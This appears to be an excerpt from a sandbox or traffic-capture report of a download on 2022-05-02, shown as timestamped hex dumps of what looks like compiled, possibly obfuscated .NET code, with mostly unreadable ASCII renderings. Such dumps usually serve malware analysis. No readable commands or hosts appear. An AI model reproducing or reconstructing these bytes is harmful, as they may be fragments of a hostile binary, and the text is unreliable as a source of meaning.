                                                                                  2022-05-02 11:03:15 UTC3122INData Raw: 01 19 1c 02 76 22 39 00 00 c1 8b 00 93 00 00 00 01 19 0c 02 76 02 d8 00 00 c1 76 00 93 00 00 00 01 18 f8 02 76 02 d4 00 00 70 51 18 91 00 00 00 01 18 e4 02 75 14 5d 00 00 c1 6b 00 91 00 00 00 01 18 c4 02 73 22 2c 00 00 c1 3b 00 91 00 00 00 01 18 4c 02 73 02 d4 00 00 c1 30 00 91 00 00 00 01 17 1c 02 72 1e f2 00 00 02 d1 00 93 00 00 00 01 16 ac 02 72 02 d4 00 00 70 51 18 91 00 00 00 01 16 98 02 72 0e a0 00 00 c1 06 00 93 00 00 00 01 16 84 02 72 11 06 00 00 c0 f1 00 93 00 00 00 01 16 70 02 72 04 f3 00 00 c0 dc 00 93 00 00 00 01 16 5c 02 72 0e a0 00 00 c0 c7 00 93 00 00 00 01 16 48 02 72 12 7b 00 00 c0 a9 00 93 00 00 00 01 16 30 02 72 22 08 00 00 c0 94 00 93 00 00 00 01 16 20 02 72 02 d8 00 00 c0 7f 00 93 00 00 00 01 16 0c 02 72 02 d4 00 00 70 51 18 91 00 00
                                                                                  Data Ascii: v"9vvvpQu]ks",;Ls0rrpQrrpr\rHr{0r" rrpQ
                                                                                  2022-05-02 11:03:15 UTC3138INData Raw: 38 00 13 99 ec 00 01 96 2d 00 13 99 dd 00 01 96 22 00 13 99 bf 00 01 96 17 00 13 99 b0 00 01 96 0c 00 13 99 a3 00 01 96 01 00 13 99 85 00 01 95 f6 00 13 99 69 00 01 95 eb 00 13 99 45 00 01 95 e0 00 13 99 27 00 01 95 d5 00 13 99 09 00 01 95 ca 00 13 98 e9 00 01 95 bf 00 13 98 da 00 01 95 b4 00 13 98 cb 00 01 95 a9 00 13 98 b1 00 01 95 9e 00 13 98 95 00 01 95 93 00 13 98 85 00 01 95 88 00 13 98 6b 00 01 95 7d 00 13 98 55 00 01 95 72 00 13 98 45 00 01 95 67 00 13 98 2d 00 01 95 5c 00 13 98 13 00 01 95 51 00 13 98 06 00 01 95 46 00 13 97 d6 00 01 95 3b 00 13 97 be 00 01 95 30 00 13 97 a8 00 01 95 25 00 13 97 8c 00 01 95 1a 00 13 97 7b 00 01 95 0f 00 13 97 6b 00 01 95 04 00 13 97 4d 00 01 94 f9 00 13 97 33 00 01 94 ee 00 13 97 23 00 01 94 e3 00 13 97 15 00 01
                                                                                  Data Ascii: 8-"iE'k}UrEg-\QF;0%{kM3#
                                                                                  2022-05-02 11:03:15 UTC3154INData Raw: 7e 00 03 05 05 00 00 03 d4 00 03 05 05 00 00 03 72 00 03 05 05 00 00 06 11 00 03 05 05 00 00 05 fd 00 03 05 05 00 00 04 f9 00 03 05 05 00 00 05 cb 00 03 0c 90 00 00 04 79 00 03 0c 90 00 00 03 b9 00 03 05 05 00 00 03 64 00 03 05 05 00 00 06 0c 00 03 05 05 00 00 05 f8 00 03 05 05 00 00 04 f4 00 03 0c 90 00 00 05 c6 00 03 0c 90 00 00 04 74 00 03 0c 90 00 00 03 b2 00 03 0c 90 00 00 03 5f 00 03 0c 90 00 00 06 07 00 03 0c 90 00 00 03 cd 00 03 05 05 00 00 03 c3 00 03 05 05 00 00 03 c8 00 03 05 05 00 00 03 be 00 03 05 05 00 00 03 ad 00 03 05 05 00 00 02 de 00 03 05 05 00 00 03 d2 00 03 05 05 00 00 03 b7 00 03 05 05 00 00 03 6e 00 03 05 05 00 00 03 70 00 03 10 65 00 00 02 dc 00 03 10 65 00 00 02 da 00 03 0c 90 00 00 02 d1 00 03 02 e1 00 00 03 70 00 03 02 e1 00 00
                                                                                  Data Ascii: ~rydt_npeep
                                                                                  2022-05-02 11:03:15 UTC3170INData Raw: 00 00 00 3e 01 00 00 01 00 17 42 0a 15 00 65 00 00 00 00 00 00 3d ed 00 00 01 00 17 3e 0a 14 00 65 00 00 00 00 00 00 3d d9 00 00 01 00 17 3a 0a 13 00 65 00 00 00 00 00 00 3d c5 00 00 01 00 17 36 0a 12 00 65 00 00 00 00 00 00 3d b1 00 00 01 00 17 32 0a 11 00 65 00 00 00 00 00 00 3d 9d 00 00 01 00 17 2e 0a 10 00 65 00 00 00 00 00 00 3d 89 00 00 01 00 17 2a 0a 0f 00 65 00 00 00 00 00 00 3d 75 00 00 01 00 17 26 0a 0e 00 65 00 00 00 00 00 00 3d 61 00 00 01 00 17 22 0a 0d 00 65 00 00 00 00 00 00 3d 4d 00 00 01 00 17 1e 0a 0c 00 65 00 00 00 00 00 00 3d 39 00 00 01 00 17 1a 0a 0b 00 65 00 00 00 00 00 00 3d 25 00 00 01 00 17 16 0a 0a 00 65 00 00 00 00 00 00 3d 11 00 00 01 00 17 12 0a 09 00 65 00 00 00 00 00 00 3c fd 00 00 01 00 17 0e 0a 08 00 65 00 00 00 00 00 00
                                                                                  Data Ascii: >Be=>e=:e=6e=2e=.e=*e=u&e=a"e=Me=9e=%e=e<e
                                                                                  2022-05-02 11:03:15 UTC3186INData Raw: 70 00 10 01 0d 00 36 01 ac 00 5d 00 00 00 00 00 00 03 6e 00 10 01 0d 00 36 01 71 00 61 00 00 00 00 00 00 02 dc 00 00 01 05 00 36 00 22 00 61 00 00 00 00 00 00 02 da 00 00 01 05 00 36 00 20 00 5d 00 00 00 00 00 00 02 d1 00 10 01 0d 00 35 00 20 00 59 00 00 00 00 00 00 03 64 00 10 01 80 00 2b 00 1f 00 59 00 00 00 00 00 00 03 5f 00 10 01 00 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 4c 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 39 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 26 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 13 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 03 00 00 00 01 13 00 2b 00 1f 00 5d 00 00 00 00 00 00 02 e3 00 00 01 13 00 2a 00 19 00 59 00 00 00 00 00 00 02 de 00 00 01 00 00 1e 00 11 00 59 00 00 00 00 00 00 02 dc 00 10
                                                                                  Data Ascii: p6]n6qa6"a6 ]5 Yd+Y_+]L+]9+]&+]+]+]*YY
                                                                                  2022-05-02 11:03:15 UTC3202INData Raw: b8 28 05 2b 4a 2a 06 00 1c 96 6f 01 0e 00 0e 02 0e 33 40 97 cf 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 04 f4 d0 41 32 b9 3e 28 05 2b 4a 2a 06 00 1c 92 6f 01 0e 00 0e 02 0e 3b 34 34 30 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 04 f3 d0 44 7f 03 8b 28 05 2b 4a 2a 06 00 1c 8e 6f 01 0e 00 0e 02 0e 3e 10 e8 72 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 04 f2 d0 6b 06 91 30 28 05 2b 4a 00 00 2a 06 00 1c 8a 6f 00 0e 01 0e 3d 69 12 f5 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 04 f1 d0 6a 0d bb 96 28 05 2b 4a 00 00 2a 06 00 1c 86 6f 00 0e 01 0e 64 68 e2 48 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 04 f0 d0 2e 5d 96 b9 28 05 2b 4a 2a 06 00 1c 82 6f 01 0e 00 0e 02 0e 3e 33 3d ec 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 04 ef d0 67 61 f5 a0 28 05 2b 4a 00 00 2a 06 00 1c 7e 6f 00 0e
                                                                                  Data Ascii: (+J*o3@(+N*)(A2>(+J*o;440(+N*)(D(+J*o>r(+N*)(k0(+J*o=i(+F*)(j(+J*odhH(+F*)(.](+J*o>3=(+N*)(ga(+J*~o
                                                                                  2022-05-02 11:03:15 UTC3218INData Raw: 4a 00 00 2a 06 00 16 6e 6f 00 0e 01 0e 6b 23 21 d7 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 6a d0 6d 0f d3 0a 28 05 2b 4a 2a 06 00 16 6a 6f 01 0e 00 0e 02 0e 30 40 b6 5b 28 05 2b 4e 00 2a 06 00 0c 29 28 02 00 03 69 d0 63 41 c9 6e 28 05 2b 4a 00 00 2a 06 00 16 66 6f 00 0e 01 0e 35 09 04 32 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 68 d0 50 61 aa a6 28 05 2b 4a 00 00 2a 06 00 16 62 6f 00 0e 01 0e 5b 6d b9 c8 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 67 d0 64 5a c5 70 28 05 2b 4a 00 00 2a 06 00 16 5e 6f 00 0e 01 0e 6d 2d 43 a0 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 66 d0 41 73 4f f9 28 05 2b 4a 00 00 2a 06 00 16 5a 6f 00 0e 01 0e 3e 7f 85 62 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 03 65 d0 64 2f 39 10 28 05 2b 4a 2a 06 00 16 56 6f 01 0e 00 0e 02 0e 5f 0c
                                                                                  Data Ascii: J*nok#!(+F*)(jm(+J*jo0@[(+N*)(icAn(+J*fo52(+F*)(hPa(+J*bo[m(+F*)(gdZp(+J*^om-C(+F*)(fAsO(+J*Zo>b(+F*)(ed/9(+J*Vo_
                                                                                  2022-05-02 11:03:15 UTC3234INData Raw: 02 00 01 d8 d0 37 4d 5d 71 28 05 2b 4a 2a 06 00 10 22 6f 00 0e 46 05 2b 5d 28 05 2b 3e 00 2a 06 00 0c 29 28 02 00 01 d7 d0 57 7d 3a 7a 28 05 2b 4a 00 00 2a 06 00 10 1e 6f 00 0e 01 0e 4c 09 94 d6 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 01 d6 d0 64 20 65 2e 28 05 2b 4a 00 00 2a 06 00 10 1a 6f 00 0e 01 0e 5d 0e 08 43 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 01 d5 d0 6a 13 f4 10 28 05 2b 4a 2a 06 00 10 16 6f 00 0e 53 22 d8 c8 28 05 2b 3e 00 2a 06 00 0c 29 28 02 00 01 d4 d0 3f 1c e8 d9 28 05 2b 4a 00 00 2a 06 00 10 12 6f 00 0e 01 0e 33 38 e0 f6 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 01 d3 d0 56 55 af 53 28 05 2b 4a 00 00 2a 06 00 10 0e 6f 00 0e 01 0e 33 1a e0 13 28 05 2b 46 00 2a 06 00 0c 29 28 02 00 01 d2 d0 69 1f e2 e2 28 05 2b 4a 00 00 2a 06 00 10 0a 6f 00 0e
                                                                                  Data Ascii: 7M]q(+J*"oF+](+>*)(W}:z(+J*oL(+F*)(d e.(+J*o]C(+F*)(j(+J*oS"(+>*)(?(+J*o38(+F*)(VUS(+J*o3(+F*)(i(+J*o
                                                                                  2022-05-02 11:03:15 UTC3250INData Raw: 1f 00 00 08 00 00 00 00 1f 00 00 00 02 00 00 1c 41 00 00 00 ff ff f7 de 38 dc 00 00 00 00 38 0a 00 00 77 28 00 11 00 00 00 00 38 00 00 00 11 39 01 11 ff ff f7 fc dd ff ff fc c0 38 a2 0a 00 02 46 6f 0a 00 02 6f 6f 9a 0c 11 06 11 0c 11 07 11 ff ff fd 4d 38 04 13 0a 00 03 f5 73 17 a2 0a 00 00 23 28 1b 00 00 51 d0 17 25 a2 0a 00 00 23 28 06 00 0c bf 28 01 00 00 16 20 16 25 01 00 00 2f 8d 18 0a 00 00 23 28 06 00 0c bf 28 01 00 00 16 20 0a 00 00 5b 7e ff ff fb ce 38 0e 13 16 ff ff fa ad 38 ff ff fa 6a 39 0a 00 01 dc 6f 10 11 ff ff fb 50 38 0e 13 58 17 0e 11 ff ff fe 08 38 06 00 21 37 28 04 00 0c 92 7e 0e 11 05 11 ff ff f8 ad 38 00 00 00 09 20 0a 00 00 19 6f 0a 00 03 3a 7e 05 11 ff ff fa aa 38 ff ff fe 15 38 ff ff fa 77 38 ff ff fe 30 3a 0a 00 02 67 6f 02 ff ff
                                                                                  Data Ascii: A88w(898FoooM8s#(Q%#(( %/#(( [~88j9oP8X8!7(~8 o:~88w80:go
                                                                                  2022-05-02 11:03:15 UTC3266INData Raw: 39 06 00 0f 77 28 04 00 07 54 7b 12 11 ff ff f7 85 38 18 13 0a 00 02 46 6f 18 11 00 00 24 70 38 00 00 18 17 38 00 00 0e 8a 38 0b 13 06 00 0f 5c 28 0d 11 00 00 24 9f 38 0b 13 06 00 0f 5c 28 06 00 20 c3 28 04 00 0c 75 7e 04 00 07 91 7b 02 ff ff dd e2 38 00 00 00 46 20 00 00 10 0f 38 00 00 14 6b 38 0b 13 06 00 0f 5c 28 06 00 20 c3 28 04 00 0c 75 7e 04 00 07 91 7b 02 2a 00 00 09 7d 38 07 13 17 00 00 09 16 38 00 00 1e 1c 3e 16 06 00 20 f7 28 04 00 0c 82 7e 04 00 07 91 7b 02 00 00 08 49 38 0f 13 0a 00 03 d1 73 ff ff e8 50 38 06 00 20 b7 28 04 00 0c 72 7e 06 00 20 ef 28 04 00 0c 80 7e 0b 11 23 11 04 00 07 91 7b 02 ff ff de 60 38 00 00 00 1f 20 26 ff ff de 6b 39 06 00 0f 6a 28 00 00 00 17 20 0d 13 06 00 20 c3 28 04 00 0c 75 7e 04 00 07 91 7b 02 7a 06 00 0e bf 73
                                                                                  Data Ascii: 9w(T{8Fo$p888\($8\( (u~{8F 8k8\( (u~{*}88> (~{I8sP8 (r~ (~#{`8 &k9j( (u~{zs
                                                                                  2022-05-02 11:03:15 UTC3282INData Raw: 42 00 2a 06 00 0f d3 28 04 00 08 39 7e 4d 49 8f 6b 28 05 2b 4a 00 00 2a 06 00 20 9b 28 04 00 0c 6b 7e 06 00 20 0b 28 04 00 0c 47 7e 02 5e 7f 53 ea 28 05 2b 76 00 00 ff ff ff df 38 ff ff ff e6 3b 04 00 07 62 7b 02 04 00 07 62 7b 00 11 2a 17 2a 17 2a 17 2a 16 2a 17 ff ff ff c4 38 00 00 00 0b 39 06 00 20 07 28 04 00 0c 46 7e 03 00 00 00 1d 38 00 00 00 24 3b 04 00 07 63 7b 02 04 00 07 63 7b 00 11 ff ff ff e3 38 00 00 00 35 39 02 00 01 a2 75 03 00 00 00 10 38 00 13 02 00 01 a2 74 03 00 00 00 34 38 68 0c e0 26 28 05 2b 11 00 01 cd 00 00 00 76 00 03 30 13 00 00 00 2a 16 2a 16 2a 17 2a 16 ff ff ff c0 38 ff ff ff c7 3b 04 00 07 63 7b 02 04 00 07 63 7b 00 11 ff ff ff ca 38 00 00 00 20 39 02 00 01 a2 75 03 00 00 00 27 38 00 00 00 2e 3b 04 00 07 62 7b 02 04 00 07 62
                                                                                  Data Ascii: B*(9~MIk(+J* (k~ (G~^S(+v8;b{b{*****89 (F~8$;c{c{859u8t48h&(+v0****8;c{c{8 9u'8.;b{b
                                                                                  2022-05-02 11:03:15 UTC3298INData Raw: 2a 06 00 0d a0 73 6a d8 04 00 07 41 7b 04 00 07 42 7c 02 00 01 95 74 03 04 00 07 41 7b 04 00 07 42 7c 06 00 0e 14 6f 02 2a 06 00 0d a0 73 d8 04 00 07 4c 7b 04 00 07 4d 7c 06 00 0e 16 6f 02 00 01 95 74 03 04 00 07 4c 7b 04 00 07 4d 7c 06 00 0e 16 6f 02 00 00 00 69 38 00 00 00 59 39 06 00 20 0f 28 04 00 0c 48 7e 03 00 00 00 ed 38 00 00 00 05 39 06 00 20 07 28 04 00 0c 46 7e 03 54 2d 6d 01 28 05 2b 00 00 00 00 00 00 01 35 00 03 30 13 ff ff ff 50 38 01 10 06 00 20 0b 28 04 00 0c 47 7e 03 ff ff fe ee 38 ff ff ff 1f 40 1e 0a 00 00 1b 28 ff ff ff 87 38 ff ff ff b8 40 1e 0a 00 00 1b 28 00 00 00 10 38 ff ff ff 6c 39 06 00 20 13 28 04 00 0c 49 7e 03 2a 06 00 0d a0 73 6a 5a 04 00 07 41 7b 04 00 07 42 7c 02 00 01 95 74 03 04 00 07 41 7b 04 00 07 42 7c 06 00 0e 14 6f
                                                                                  Data Ascii: *sjA{B|tA{B|o*sL{M|otL{M|oi8Y9 (H~89 (F~T-m(+50P8 (G~8@(8@(8l9 (I~*sjZA{B|tA{B|o
                                                                                  2022-05-02 11:03:15 UTC3314INData Raw: 93 00 04 30 13 00 ff ff ff a6 38 01 10 06 00 20 0b 28 04 00 0c 47 7e 03 ff ff ff 8b 38 ff ff ff a2 39 06 00 20 13 28 04 00 0c 49 7e 03 2a 04 fe 04 00 07 41 7b 04 00 07 42 7c 02 00 01 95 74 03 04 00 07 41 7b 04 00 07 42 7c 02 00 00 00 00 38 00 00 00 23 39 06 00 20 0f 28 04 00 0c 48 7e 03 00 00 00 48 38 00 00 00 05 39 06 00 20 07 28 04 00 0c 46 7e 03 7a 06 00 0e bf 73 2a 06 00 20 83 28 04 00 0c 65 7e 02 02 00 01 98 74 03 00 00 00 18 38 58 5e f5 a2 28 05 2b 00 00 00 00 00 00 00 93 00 04 30 13 ff ff ff a3 38 ff ff ff 93 39 06 00 20 07 28 04 00 0c 46 7e 03 ff ff ff 81 38 ff ff ff 90 3a 06 00 20 13 28 04 00 0c 49 7e 03 2a 01 fe 16 03 fe 04 00 07 40 7b 04 00 07 42 7c 02 00 01 95 74 03 04 00 07 40 7b 04 00 07 42 7c 02 ff ff ff d9 38 01 10 06 00 20 0b 28 04 00 0c
                                                                                  Data Ascii: 08 (G~89 (I~*A{B|tA{B|8#9 (H~H89 (F~zs* (e~t8X^(+089 (F~8: (I~*@{B|t@{B|8 (
                                                                                  2022-05-02 11:03:15 UTC3330INData Raw: 07 25 7e 04 00 07 25 80 02 00 01 8b 74 0a 00 00 ac 28 0a 00 00 23 28 06 00 0c bf 28 02 00 01 8b 20 06 00 0c 34 28 0a 00 00 c6 28 70 00 07 05 72 0a 00 00 bb 28 70 00 06 f3 72 06 00 0c 3b 28 00 00 00 3c 3a 04 00 07 25 7e 00 00 00 00 00 00 00 55 00 06 30 13 2a 06 00 0c a6 6f 04 03 02 04 00 07 16 7e 04 00 07 16 80 02 00 01 8a 74 0a 00 00 ac 28 0a 00 00 23 28 06 00 0c bf 28 02 00 01 8a 20 06 00 0c 34 28 0a 00 00 c6 28 70 00 06 df 72 0a 00 00 bb 28 70 00 06 d3 72 06 00 0c 3b 28 00 00 00 3c 3a 04 00 07 16 7e 00 00 00 00 00 00 00 54 00 05 30 13 01 00 00 16 06 00 ed 57 00 96 00 00 01 00 00 16 06 00 8f 5d 00 32 00 00 01 00 00 16 06 00 2b 2b 00 00 00 00 00 00 28 01 00 2a 06 2a 70 00 00 01 72 00 00 00 00 dd 26 00 00 00 06 dd 00 00 00 11 dd 0a 0a 00 00 c0 6f 0a 00 02
                                                                                  Data Ascii: %~%t(#(( 4((pr(pr;(<:%~U0*o~t(#(( 4((pr(pr;(<:~T0W]2++(**pr&o
                                                                                  2022-05-02 11:03:15 UTC3346INData Raw: 45 00 05 0c fe 00 00 03 5d 38 6d 3a 2e c6 28 05 2b 11 00 01 b1 00 00 03 bc 00 06 30 1b 00 ff ff ff 76 38 ff ff ff 7c 3a 0a 00 01 f0 6f 00 11 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 46 20 03 ff ff ff de 38 04 00 06 f7 7d 03 02 ff ff ff 1c 38 04 00 06 f8 7d 06 00 1f c3 28 04 00 0c 35 7e 03 02 ff ff ff 6a 38 00 00 00 27 3a 06 00 16 6f 28 04 00 09 e0 7e 00 11 ff ff ff 3a 38 00 00 00 00 20 26 ff ff ff 45 39 04 00 08 24 7b 04 00 08 2c 7e 00 00 00 00 20 04 00 06 f6 7d 04 02 2a ff ff ff 70 38 ff ff ff a1 3a 03 00 00 00 32 38 00 13 06 00 18 4b 28 04 00 0a 57 7e 04 7a 0a 00 01 8c 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e8 7b 04 00 08 2c 7e 61 44 c4 1a ed 20 65 4b 6e c1 20 00 00 00 a2 38 00 00 00 49 39 06 00 1f bf 28 04 00 0c 34 7e
                                                                                  Data Ascii: E]8m:.(+0v8|:ow(~#((F 8}8}(5~j8':o(~:8 &E9${,~ }*p8:28K(W~zs(&~a{,~aD eKn 8I9(4~
                                                                                  2022-05-02 11:03:15 UTC3362INData Raw: 00 00 2e 38 0a 00 03 50 7e 00 00 00 28 38 51 0a 0d 64 28 05 2b 11 00 01 ab 00 00 00 4b 00 04 30 13 00 ff ff ff c1 38 00 13 0a 00 03 4f 7e 2a ff ff ff e6 38 00 00 00 06 3a 04 00 00 00 0c 38 00 00 00 16 38 0a 00 03 4e 7e 00 00 00 1a 38 0a 00 02 e2 6f 04 00 06 e3 7b 03 00 11 04 00 06 ee 7b 02 00 00 00 27 38 4f 13 06 19 28 05 2b 11 00 01 ab 00 00 00 4b 00 04 30 13 00 00 2a 00 00 00 00 38 06 00 1e e3 28 04 00 0b fd 7e 0a 00 02 db 7e 02 56 59 92 e6 28 05 2b 76 00 00 ff ff ff cc 38 00 13 0a 00 03 4d 7e 00 00 00 00 38 00 00 00 0a 38 0a 00 03 4c 7e 2a 00 00 00 00 38 0a 00 02 e2 6f 04 00 06 e3 7b 03 00 11 04 00 06 ee 7b 02 00 00 00 19 38 00 00 00 2d 3a 04 65 7a d5 16 28 05 2b 11 00 01 ab 00 00 00 46 00 04 30 13 00 ff ff ff c1 38 00 13 0a 00 03 4b 7e 2a 00 00 00 01
                                                                                  Data Ascii: .8P~(8Qd(+K08O~*8:88N~8o{{'8O(+K0*8(~~VY(+v8M~88L~*8o{{8-:ez(+F08K~*
                                                                                  2022-05-02 11:03:15 UTC3378INData Raw: c2 7e 04 00 06 d5 7b 02 00 00 01 e2 38 00 00 05 4c 39 0a 00 02 0c 28 14 04 00 06 d3 7b 02 00 00 05 5d 38 00 00 05 2e 38 00 00 01 32 38 02 13 06 00 08 d3 73 02 11 06 00 1e af 28 04 00 0b f0 7e 02 0d 11 17 7a 0a 00 02 51 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 04 7b 04 00 08 2c 7e 61 66 b0 f3 2a 20 2c ad 50 5f 20 00 00 04 7b 38 00 00 02 b6 38 00 00 01 c5 38 02 13 06 00 09 41 73 02 11 04 00 06 d7 7b 02 00 00 04 4b 38 00 00 03 71 00 00 00 e6 00 00 03 d7 00 00 00 19 00 00 00 85 00 00 04 50 00 00 00 06 45 00 06 0c fe 00 00 03 d7 38 06 00 1a a3 28 04 00 0a ed 7e 00 12 04 00 06 d7 7b 02 00 2a 11 11 00 00 07 9f 38 5e 27 d2 a1 28 05 2b 11 00 01 97 00 00 07 b3 00 0c 30 1b ff ff ff da 38 ff ff ff a9 3a 0a 00 01 a0 28 14 02 ff ff ff b5 38 ff ff ff bc 39 06 00 16
                                                                                  Data Ascii: ~{8L9({]8.828s(~zQs(&~a{,~af* ,P_ {888As{K8qPE8(~{*8^'(+08:(89
                                                                                  2022-05-02 11:03:15 UTC3394INData Raw: 28 04 00 09 a9 7e 6a 15 04 0e 02 03 00 00 00 00 8e 38 48 25 69 8d 28 05 2b 11 00 01 80 00 00 00 af 00 07 30 1b 2a 06 00 1e 0f 28 04 00 0b c8 7e 14 05 04 03 02 2e 57 6b 47 28 05 2b 5e 00 00 00 00 19 00 c0 a8 00 18 00 02 00 00 10 01 00 2a ff ff ff 9d 38 03 10 06 00 1d 27 28 04 00 0b 8e 7e 0a 00 00 25 6f 04 02 7a 0a 00 01 8c 73 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 02 7b 04 00 08 2c 7e 61 ad 10 b6 af 20 c5 e0 e0 c0 20 ff ff fe f4 38 ff ff ff e0 39 0a 00 01 a0 28 14 05 ff ff ff d7 38 00 13 06 00 1d d7 28 04 00 0b ba 7e 03 0f 02 ff ff ff 24 38 01 13 06 00 14 7b 28 04 00 09 63 7e 06 0e 02 03 00 00 00 78 38 dc 00 00 00 00 38 0a 00 00 4c 6f 01 11 00 00 00 00 38 00 00 00 11 39 01 11 00 00 00 96 dd ff ff ff de 38 ff ff ff af 38 ff ff ff d4 38 06 00 1e 0b 28 04
                                                                                  Data Ascii: (~j8H%i(+0*(~.WkG(+^*8'(~%ozs(&~a{,~a 89(8(~$8{(c~x88Lo89888(
                                                                                  2022-05-02 11:03:15 UTC3410INData Raw: 04 11 0a 00 02 da 7e 50 05 0e ff ff fd 10 38 06 00 18 07 28 04 00 0a 46 7e 01 11 00 11 ff ff fc 58 38 ff ff fe 2a 38 00 00 00 a7 38 03 13 16 ff ff ff dc 38 06 00 18 07 28 04 00 0a 46 7e 01 11 00 11 00 00 00 13 38 06 00 1d 77 28 04 00 0b a2 7e 00 11 ff ff ff 88 38 02 13 16 ff ff fe 5b 38 06 00 1d 77 28 04 00 0b a2 7e 00 11 00 00 00 7c 38 0a 00 02 d8 6f 14 04 00 06 93 7b 07 11 0a 00 02 da 7e 50 05 0e 00 00 01 34 38 05 13 16 ff ff fe 23 38 51 06 00 1d 63 28 04 00 0b 9d 7e 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 24 7b 04 00 08 2c 7e 61 8d ac cf 74 20 88 d8 96 e1 20 04 05 0e ff ff fd 5f 38 ff ff fc cf 38 ff ff fe ee 38 04 13 9a 03 11 05 ff ff ff b1 38 05 13 58 17 05 11 ff ff ff cc 38 0a 00 00 19 6f 0a 00 00 31 7e 50 05 0e ff ff fd ab 38 00 00 00 22 3f 69 8e
                                                                                  Data Ascii: ~P8(F~X8*888(F~8w(~8[8w(~|8o{~P48#8Qc(~(&~a${,~at _8888X8o1~P8"?i
                                                                                  2022-05-02 11:03:15 UTC3426INData Raw: fd 7e 10 11 0b 11 ff ff fc 70 38 08 13 58 17 08 11 ff ff f5 a5 38 ff ff fd 05 3a 04 0e ff ff f4 ac 38 1e 13 06 00 1c 47 28 04 00 0b 56 7e 05 16 16 06 00 1c 57 28 04 00 0b 5a 7e 19 11 1c 11 04 00 06 5b 7b 02 00 00 00 28 38 ff ff f7 06 39 06 00 1c 7b 28 04 00 0b 63 7e 06 00 1c 63 28 04 00 0b 5d 7e 19 11 ff ff f3 fb 38 ff ff f7 be 3c 16 2b 00 00 32 28 23 11 22 11 ff ff f8 e5 38 15 13 58 17 15 11 ff ff f9 bb 38 17 13 00 11 ff ff f5 14 38 0e 13 00 11 ff ff fa 1b 38 ff ff f7 02 39 0a 00 00 9b 28 06 00 13 87 28 04 00 09 26 7e 61 04 00 08 2f 7b 04 00 08 2c 7e 61 11 b6 97 80 20 66 ee e7 d7 df 20 1a 11 ff ff fa 63 38 ff ff f7 34 3a 06 00 1c 5f 28 04 00 0b 5c 7e 19 11 ff ff ec eb 38 ff ff fd 5d 3a 0d 11 ff ff ee 14 38 06 00 16 df 28 04 00 09 fc 7e 16 00 11 04 00 06
                                                                                  Data Ascii: ~p8X8:8G(V~W(Z~[{(89{(c~c(]~8<+2(#"8X8889((&~a/{,~a f c84:_(\~8]:8(~
                                                                                  2022-05-02 11:03:15 UTC3442INData Raw: 00 00 0a 5a 00 00 05 f4 00 00 02 26 00 00 06 9b 00 00 05 b3 00 00 00 05 00 00 06 30 00 00 03 26 00 00 05 fc 00 00 01 49 00 00 00 0b 45 00 12 0c fe 00 00 07 e7 38 5b 4e 99 3d 28 05 2b 11 00 01 4a 00 00 0c 5d 00 06 30 13 00 2a 01 fe 03 5f 03 02 68 77 67 91 28 05 2b 3a 00 00 00 ff ff ff 2a 38 01 13 0a 00 02 87 6f 02 ff ff ff e1 38 ff ff ff 95 38 00 00 00 0a 38 ff ff ff 9f 39 0a 00 02 6d 28 14 9a 04 0e 50 05 ff ff ff d1 38 ff ff ff 36 39 0a 00 00 9b 28 04 0a 00 02 0b 6f 06 00 19 ff 28 04 00 0a c4 7e 9a 02 11 03 ff ff ff e7 38 00 00 00 28 3a 50 05 00 00 00 44 38 51 01 00 00 2e 8d 1e 05 00 00 00 19 38 ff ff ff 5b 38 ff ff ff 77 38 a2 02 04 0e 50 05 7a 06 00 05 ce 73 0a 00 01 70 28 0a 00 02 0b 6f 01 11 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e6 7b 04 00 08 2c
                                                                                  Data Ascii: Z&0&IE8[N=(+J]0*_hwg(+:*8o8889m(P869(o(~8(:PD8Q.8[8w8Pzsp(o(&~a{,
                                                                                  2022-05-02 11:03:16 UTC3458INData Raw: 00 0c bf 28 01 00 00 cf 20 00 00 00 19 38 06 00 0f d3 28 04 00 08 39 7e 2a 00 00 00 01 38 66 57 60 f2 28 05 2b 00 00 00 00 00 00 00 44 00 02 30 03 00 00 ff ff ff 40 38 06 00 16 7f 28 04 00 09 e4 7e 16 03 ff ff ff 27 38 06 00 16 f7 28 04 00 0a 02 7e 0a 00 02 4d 28 06 00 13 87 28 04 00 09 26 7e 61 04 00 07 e6 7b 04 00 08 2c 7e 61 6d e2 1c 55 20 65 88 a8 f3 eb 20 06 00 09 4d 28 06 00 0c bf 28 01 00 00 07 20 03 ff ff ff 48 38 06 00 18 cf 28 04 00 0a 78 7e a2 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 fa 20 03 17 25 a2 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 0c bf 28 01 00 00 07 20 03 16 25 01 00 00 2f 8d 18 06 00 16 77 28 04 00 09 e2 7e 0a 00 00 23 28 06 00 09 4e 28 01 00 00 cf 20 03 03 ff ff ff 74 38 06 00 17 53 28 04 00
                                                                                  Data Ascii: ( 8(9~*8fW`(+D0@8(~'8(~M((&~a{,~amU e M(( H8(x~w(~#(( %w(~#(( %/w(~#(N( t8S(
